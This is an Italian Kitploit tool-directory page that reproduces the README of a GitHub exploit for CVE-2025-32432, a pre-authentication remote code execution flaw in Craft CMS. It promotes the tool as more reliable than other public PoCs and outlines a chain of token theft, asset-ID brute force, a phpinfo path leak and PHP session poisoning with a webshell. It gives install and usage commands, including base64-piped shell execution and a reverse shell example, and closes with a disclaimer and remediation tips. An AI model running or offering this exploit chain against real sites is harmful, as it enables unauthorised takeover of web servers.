Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-32432-exploit-by-P34NUT — Exploit RCE pre-auth affidabile per CVE-2025-32432 su Craft CMS 3.x/4.x/5.x, funziona dove altri PoC pubblici falliscono | Kitploit
Strumenti/GitHubGitHub/p34nut2/cve-2025-32432-exploit-by-p34nut
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPost-ExploitSicurezza WebPenetration TestingRed TeamingStrumento di Accesso RemotoSviluppo Payload
GitHubp34nut2/cve-2025-32432-exploit-by-p34nut

CVE-2025-32432-exploit-by-P34NUT

Exploit RCE pre-auth affidabile per CVE-2025-32432 su Craft CMS 3.x/4.x/5.x, funziona dove altri PoC pubblici falliscono

Vedi Repository
214h 54m faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-32432 — Exploit RCE Pre-Auth per Craft CMS

Autore: P34NUT2
Vulnerabilità: Remote Code Execution (Pre-Autenticato) in Craft CMS
CVE: CVE-2025-32432
Target: Qualsiasi istanza vulnerabile di Craft CMS (3.x / 4.x / 5.x) — testato su Hack The Box: Orion


⚠️ Disclaimer

Questo strumento è fornito esclusivamente per scopi educativi e test di penetrazione autorizzati all'interno di ambienti controllati come Hack The Box, TryHackMe o setup di laboratorio privati di tua proprietà o per i quali hai esplicita autorizzazione scritta a testare.

L'uso non autorizzato di questo strumento contro sistemi di cui non sei proprietario o per i quali non hai esplicita autorizzazione a testare è illegale ai sensi del Computer Fraud and Abuse Act (CFAA), della Direttiva UE sugli attacchi ai sistemi informativi e leggi equivalenti nella maggior parte delle giurisdizioni mondiali.

L'autore non si assume alcuna responsabilità o obbligo per qualsiasi uso improprio, danno o conseguenza legale derivante dall'uso di questo software. Usa in modo responsabile ed etico.


💡 Motivazione e Contesto

La maggior parte delle PoC pubbliche per CVE-2025-32432 fallisce contro target reali come HTB: Orion a causa di:

  • Codifica impropria dei parametri URL
  • Gestione errata dei caratteri speciali (&, , )
>
<
  • Troncamento del file di sessione durante la fase di PHP session poisoning
  • Questo exploit è stato costruito da zero per risolvere questi problemi di affidabilità. Gestisce correttamente la codifica URL, automatizza l'estrazione dinamica dei token e utilizza pipeline wrapper Base64 per ottenere un'esecuzione affidabile contro qualsiasi istanza vulnerabile di Craft CMS — validato su deployment reali e dimostrato su HTB Orion.


    🔗 Catena di Sfruttamento Tecnica

    StepAzioneDescrizione
    1Acquisizione Sessione e CSRFEstrae CraftSessionId, CRAFT_CSRF_TOKEN e il CSRF_TOKEN dinamico dall'endpoint admin
    2Scoperta Asset IDForza bruta gli Asset ID validi necessari per il payload di generazione transform
    3Leak del Percorso di SessioneInietta un oggetto Guzzle per attivare phpinfo() e leggere dinamicamente session.save_path
    4Session PoisoningInietta un payload webshell PHP URL-encoded nel file di sessione attivo
    5Trigger RCEDeserializza la sessione avvelenata per eseguire comandi di sistema arbitrari

    📦 Installazione

    root@kitploit:~
    git clone https://github.com/P34NUT2/CVE-2025-32432-exploit-by-P34NUT2.git
    cd CVE-2025-32432-exploit-by-P34NUT2
    pip install -r requirements.txt
    

    🚀 Utilizzo

    Argomenti

    FlagOpzione LungaRichiestoDescrizione
    -u--url✅ SìURL base del target (es. http://example.com)
    -c--cmd✅ SìComando da eseguire sul target remoto
    -a--asset❌ NoAsset ID valido noto (velocizza l'esecuzione)
    -s--scan-max❌ NoRange massimo di brute-force per Asset ID (Default: 300)

    Esempi

    1. Esecuzione Base di un Comando

    root@kitploit:~
    python3 craftcms_rce_exploit_php.py -u http://example.com -c "whoami"
    

    2. Con un Asset ID Noto (più veloce)

    root@kitploit:~
    python3 craftcms_rce_exploit_php.py -u http://example.com -a 1 -c "id"
    

    3. Payload Codificato (Consigliato per Caratteri Speciali)

    Per evitare che i caratteri speciali vengano alterati dai parser HTTP o troncati durante la gestione della sessione, codifica il tuo comando in Base64 prima di passarlo:

    root@kitploit:~
    # Step 1 — codifica il tuo comando localmente
    echo -n "YOUR_COMMAND_HERE" | base64
    
    # Step 2 — passa la stringa codificata attraverso lo script
    python3 craftcms_rce_exploit_php.py -u http://example.com -c "echo <BASE64_STRING> | base64 -d | sh"
    

    4. Reverse Shell tramite Wrapper Base64

    root@kitploit:~
    python3 craftcms_rce_exploit_php.py -u http://target.htb -c "echo <B64_PAYLOAD> | base64 -d | bash"
    

    🛡️ Remediation

    Se sei un amministratore di sistema o uno sviluppatore che utilizza Craft CMS, applica le seguenti mitigazioni:

    • Aggiorna Craft CMS all'ultima release corretta (≥ 5.6.17 / ≥ 4.14.14).
    • Limita l'accesso agli endpoint delle azioni amministrative (/actions/*) tramite regole firewall o middleware.
    • Proteggi le directory delle sessioni PHP — assicurati che non siano scrivibili da processi web non attendibili.
    • Monitora attività anomale di deserializzazione nei log dell'applicazione e del server web.

    📄 Licenza

    Questo progetto è concesso in licenza esclusivamente per uso educativo e di test autorizzato. Vedi LICENSE per i dettagli.

    Scarica lo strumento